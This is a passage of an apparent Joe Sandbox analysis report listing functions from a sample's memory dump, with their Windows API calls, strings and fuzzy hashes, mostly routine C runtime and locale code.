Instruction Fuzzy Hash: 3AD06C3200010DFBDF128F84DC46EDA3BAAFB48714F118000BA1856020C776E822EB91

Function 00FD8800 Relevance: 1.4, APIs: 1, Instructions: 151
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?), ref: 00FD8904

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3b1f30131a698ce9f3b0e6b9884175a19d75bba898b3a1d98b8be5425b5078bd
Instruction ID: 57ea318fcdb25fdf03d0cf47f1e0481d21c577113e649d8c2782b56d79da226f
Opcode Fuzzy Hash: 3b1f30131a698ce9f3b0e6b9884175a19d75bba898b3a1d98b8be5425b5078bd
Instruction Fuzzy Hash: 5F51C135E002189FDB00EFB8DC45AEDB7B6AF48310F18425AE545BB391DB39AD41EB91

Non-executed Functions

Function 00FF8124 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FF8308

Strings

1#INF, xrefs: 00FF825A
1#SNAN, xrefs: 00FF8230
1#QNAN, xrefs: 00FF8237
1#IND, xrefs: 00FF8229

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3a269681d837e2571d918cbe8fc7c1cf39f2a53cac74d5b7e248cab477395c9c
Instruction ID: 69aabfbd5438611d16b0217d1f5667f26b8927b97eb4bf63cca2bf99c7596b05
Opcode Fuzzy Hash: 3a269681d837e2571d918cbe8fc7c1cf39f2a53cac74d5b7e248cab477395c9c
Instruction Fuzzy Hash: CBD21672E0822D8BDB65CE28DD407EAB7B5EF44354F1441EAD50DE7250EB78AE829F40

Function 00FF6CDC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00FF6FFA,00000002,00000000,?,?,?,00FF6FFA,?,00000000), ref: 00FF6D75
GetLocaleInfoW.KERNEL32(?,20001004,00FF6FFA,00000002,00000000,?,?,?,00FF6FFA,?,00000000), ref: 00FF6D9E
GetACP.KERNEL32(?,?,00FF6FFA,?,00000000), ref: 00FF6DB3

Strings

OCP, xrefs: 00FF6D30
ACP, xrefs: 00FF6CFA

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: eeec236b722287beb96c2778ba60a4720cf0d8bcc5899ae4a4c275e3dba99000
Instruction ID: 597a032db0dbd220f5633b04cfa485cf7dd661bdbbd98fbbc1ea3d828efcbfe8
Opcode Fuzzy Hash: eeec236b722287beb96c2778ba60a4720cf0d8bcc5899ae4a4c275e3dba99000
Instruction Fuzzy Hash: DC219232F0010CAADB358F25C904BBF76A6AF55B64B568464EA4ADB235EF32DD40E350

Function 00FF6EB1 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FF6FBD
IsValidCodePage.KERNEL32(00000000), ref: 00FF7006
IsValidLocale.KERNEL32(?,00000001), ref: 00FF7015
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FF705D
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FF707C

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 02a928b81c20157e24fe322b6e4fc898c986361674094a92e86e29f16a406380
Instruction ID: 02d1bd3fe52ff4684e81fff2d58fa6a145f290089e74140314912c694eead07a
Opcode Fuzzy Hash: 02a928b81c20157e24fe322b6e4fc898c986361674094a92e86e29f16a406380
Instruction Fuzzy Hash: FE517172D0021EAFDB10DFA5EC41ABEB7B8BF04710F144469B610E71A1EF759904EB61

Function 00FF654D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetACP.KERNEL32(?,?,?,?,?,?,00FEB55B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FF660E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FEB55B,?,?,?,00000055,?,-00000050,?,?), ref: 00FF6639
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FF679C

Strings

utf8, xrefs: 00FF670B

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 89aaae7fa7c186685d20f29b0970a05a9df3bfdcbd026acf767719d41645180c
Instruction ID: 1d75004d3884d6364e9d34c4519a58508c0f6ab8a6c30864be516b1b81cc5ca7
Opcode Fuzzy Hash: 89aaae7fa7c186685d20f29b0970a05a9df3bfdcbd026acf767719d41645180c
Instruction Fuzzy Hash: 3B71F672A0020EAADB24BB75CC42BBA73A8EF04714F144429F705EB1A1FF74E941A760

Function 00FF13BF Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FF144C

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 5ac821c9fdf94562e18256c9fda8432ceb9e4fb116f2962aeda69716ae6c28c3
Instruction ID: a464b843d009f05b12e56d5c40c6f961ef44f829118c7b805a06b9f4638b1ac2
Opcode Fuzzy Hash: 5ac821c9fdf94562e18256c9fda8432ceb9e4fb116f2962aeda69716ae6c28c3
Instruction Fuzzy Hash: C1B12372D04249DFDB11CF68C881BFEBBA5FF95310F18816AE601EB261D2349D01EBA0

Function 00FF3EC7 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00FF3F62
FindNextFileW.KERNEL32(00000000,?), ref: 00FF3FDD
FindClose.KERNEL32(00000000), ref: 00FF3FFF
FindClose.KERNEL32(00000000), ref: 00FF4022

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: ab634c0b8c68e9e4b24dbe53e12534196bb80e67e757b4876fa074b06a99b4a1
Instruction ID: f5e849a291c7189147a3961934e9a435642528a254c26018ed25b2f2d475e1dd
Opcode Fuzzy Hash: ab634c0b8c68e9e4b24dbe53e12534196bb80e67e757b4876fa074b06a99b4a1
Instruction Fuzzy Hash: 3541D671D0012DAEDB24EF68CD89ABAB7B9EF84314F104195E605D71A0EB709F84EF50

Function 00FDCA4D Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FDCA59
IsDebuggerPresent.KERNEL32 ref: 00FDCB25
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FDCB3E
UnhandledExceptionFilter.KERNEL32(?), ref: 00FDCB48

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0c9d570d6b970c9b842c6da51b0e97c3fdadea481cda9dd2cbb87ffb5e376983
Instruction ID: 85304b841c71b6532e724d465c20bc9f48137e20ae7b0d56d3b06bd420aec139
Opcode Fuzzy Hash: 0c9d570d6b970c9b842c6da51b0e97c3fdadea481cda9dd2cbb87ffb5e376983
Instruction Fuzzy Hash: 8C31E775D0121D9ADF21DF64D949BCDBBB8AF08300F1041AAE50CAB250EB749A85DF85

Function 00FF6960 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FF69B4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FF69FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FF6AC4

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f2ff4922ce0b128b756d55256cb5c01649e728d683e56b3597084c2863a771cb
Instruction ID: 2361ad5d642c62252e32d40d98efbf477861b3ee266fa4a4fbd78ee8c4de4121
Opcode Fuzzy Hash: f2ff4922ce0b128b756d55256cb5c01649e728d683e56b3597084c2863a771cb
Instruction Fuzzy Hash: 2561917191020F9FDB289F28CD82BBA77A8EF44310F108179EB05D61A5EF78E951EB50

Function 00FE0863 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FE095B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FE0965
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FE0972

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b6294e9ccd3731e9a3267815e89a4ec1cea10a9ab8444671eab26709725eaa05
Instruction ID: 93b40d592e5c3beb747e5290cfbda3a06350984132659a92132a1fe93a5fea94
Opcode Fuzzy Hash: b6294e9ccd3731e9a3267815e89a4ec1cea10a9ab8444671eab26709725eaa05
Instruction Fuzzy Hash: 3131C27491121C9BCB21DF64DC88B9DBBB8BF08310F5041EAE40CA6361EB749B819F54

Function 00FE4480 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bb9886c1aa76c6a6dbd180be45cfd19757b80274a841c0adda6a547e6c1dba
Instruction ID: 32a33ff8ce50855aded09c0a0dd74f8557a9ec46db5fdf1d16cbfb4c18695ca9
Opcode Fuzzy Hash: e7bb9886c1aa76c6a6dbd180be45cfd19757b80274a841c0adda6a547e6c1dba
Instruction Fuzzy Hash: F9F13D71E012599FDF14CFA9D880AADF7B1FF89324F15826DE915A7381D730AE019B90

Function 00FED4B9 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00FED4B4,00000000,?,00000008,?,?,00FFBAD4,00000000), ref: 00FED6E6

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6f926939b60554c5553e949cda4ad06854b4cc06109481003b34c53bc2e0a030
Instruction ID: 0bd1f97cc3cc664621593518443a69abb0606d3bf092c0898c79154586216637
Opcode Fuzzy Hash: 6f926939b60554c5553e949cda4ad06854b4cc06109481003b34c53bc2e0a030
Instruction Fuzzy Hash: EAB15C32610649CFDB18CF29C486B657BF1FF45364F298658E89ACF6A1C335E982DB40

Function 00FDC51C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FDC532

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 305405b1bd50969ad019bc20477e4d44b45792671f0158b50ab882301f09889e
Instruction ID: 242ee0ba1ed531ad6da118d01356f66da1e6081961fe4abcc7228181fb2b8bfc
Opcode Fuzzy Hash: 305405b1bd50969ad019bc20477e4d44b45792671f0158b50ab882301f09889e
Instruction Fuzzy Hash: 725160B1D153068BDB28CF55E9857AAB7F9FB48320F28842BD455EB344D37AD940CB90

Function 00FE7B8A Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 00FE7D18

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 46a9ccdcccd06713fbccc7cca323d32bcb5e2de567f7d3816dc3b2b30f19ac8d
Instruction ID: 87078fb094e1cc32dc1372fc9d650b8f7a80b2c30735612a8a5e8668b202fc37
Opcode Fuzzy Hash: 46a9ccdcccd06713fbccc7cca323d32bcb5e2de567f7d3816dc3b2b30f19ac8d
Instruction Fuzzy Hash: C4C1E3309087CA8FCB35EF6AC880A7EB7B6EF45324F244659D45697391C730AC46EB91

Function 00FF6BB3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FF6C07

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 459d8c08bb36a9f4edbbd3ce417a6db00fb0fb71d33597fc41e1a304e9005e65
Instruction ID: 2fe8348c83805dde597163a62f003db6478a52b41b4124e251d8d81b717a492b
Opcode Fuzzy Hash: 459d8c08bb36a9f4edbbd3ce417a6db00fb0fb71d33597fc41e1a304e9005e65
Instruction Fuzzy Hash: 8A21C572A1120EABDB289F25DC41A7A73ACEF04311B10417AFA85C6151EF79ED40EB54

Function 00FE7842 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 00FE79CC

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a0a7cd4431ecfa6575bb97439bbd01ba24636233ef79fa9154f82d9e33506b48
Instruction ID: 14a1e66c70e81c6912f3084e23e8aeb2f51b04dca984182b4854b4a20e48640a
Opcode Fuzzy Hash: a0a7cd4431ecfa6575bb97439bbd01ba24636233ef79fa9154f82d9e33506b48
Instruction Fuzzy Hash: 1AB1F830D087CA8BCF24EF6AC8556BEB7B1AF50320F24061ED556D72A1D7349E42EB51

Function 00FF683A Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

EnumSystemLocalesW.KERNEL32(00FF6960,00000001,00000000,?,-00000050,?,00FF6F91,00000000,?,?,?,00000055,?), ref: 00FF68AC

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 0577d024d5a4f2b090bc1a1113201c9d8b648070f18f863fd90b568edaa7fc26
Instruction ID: d7cdf9a04a15099d0490ee7501f6e250097179336752098e5d25a369fe2279b3
Opcode Fuzzy Hash: 0577d024d5a4f2b090bc1a1113201c9d8b648070f18f863fd90b568edaa7fc26
Instruction Fuzzy Hash: DD114C376003095FDB189F39C8915BAB791FF80768B19442DEA46C7650DB71B843E740

Function 00FF6DE2 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FF6C5D,00000000,00000000,?), ref: 00FF6E0E

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: bb83ebe580f40f04a2896a63161969521238c7ec6783e99d125125a6f79083c4
Instruction ID: 26d45b7e0f442cf40a67dcde094f50360f7809e821ea0b5de3184e67f10d6a7f
Opcode Fuzzy Hash: bb83ebe580f40f04a2896a63161969521238c7ec6783e99d125125a6f79083c4
Instruction Fuzzy Hash: 09F0D63BA0011ABBDB285A35CC456BA7768EF40768F154428EE02E3150DE74FD01D694

Function 00FF6748 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

